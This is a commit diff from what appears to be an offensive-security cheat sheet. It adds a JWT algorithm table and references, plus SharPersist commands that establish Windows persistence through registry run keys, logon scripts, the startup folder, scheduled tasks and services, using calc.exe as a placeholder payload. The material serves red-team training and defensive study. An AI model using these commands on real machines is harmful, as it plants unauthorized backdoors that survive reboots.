SharpPersist - Windows Persistence

2019-09-13 17:38:23 +02:00 · 2019-09-13 17:38:23 +02:00 · 742e3204d3
parent 5455c30ec7
commit 742e3204d3
2 changed files with 60 additions and 2 deletions
--- a/Token/README.md
+++ b/Token/README.md
@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
 }
 ```

+| `alg` Param Value  | Digital Signature or MAC Algorithm | Requirements |
+|---|---|---|
+| HS256 | HMAC using SHA-256                             | Required  |
+| HS384 | HMAC using SHA-384                             | Optional  |
+| HS512 | HMAC using SHA-512                             | Optional  |
+| RS256	| RSASSA-PKCS1-v1_5 using SHA-256                | Recommended | 
+| RS384 | RSASSA-PKCS1-v1_5 using SHA-384                |	Optional | 
+| RS512 | RSASSA-PKCS1-v1_5 using SHA-512                |	Optional | 
+| ES256 | ECDSA using P-256 and SHA-256	                 | Recommended  | 
+| ES384 | ECDSA using P-384 and SHA-384                  | Optional     | 
+| ES512 | ECDSA using P-521 and SHA-512	                 | Optional     | 
+| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 |	Optional | 
+| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 |	Optional |
+| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 |	Optional |
+| none	| No digital signature or MAC performed          |	Required |
+ 
+
+
 ### Payload

 ```json
@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
 - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
 - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
 - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
+- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
+- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -2,6 +2,7 @@

 ## Summary

+* [Tools](#tools)
 * [Userland](#userland)
    * [Registry](#registry)
    * [Startup](#startup)
@ -13,6 +14,10 @@
 * [References](#references)


+## Tools
+
+- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
+
 ## Userland

 ### Registry
@ -24,6 +29,14 @@ Value name:  Backdoor
 Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```

+Using SharPersist
+
+```powershell
+SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
+SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
+SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
+```
+
 ### Startup

 Create a batch script in the user startup folder.
@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
 start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```

+Using SharPersist
+
+```powershell
+SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
+```
+
 ### Scheduled Task

 ```powershell
@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```

+Using SharPersist
+
+```powershell
+# Add to a current scheduled task
+SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
+
+# Add new task
+SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
+SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
+```
+
+## Windows Service
+
+Using SharPersist
+
+```powershell
+SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
+```
+
 ## Elevated

 ### HKLM
@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ## References

 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
-* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
+* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
+* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)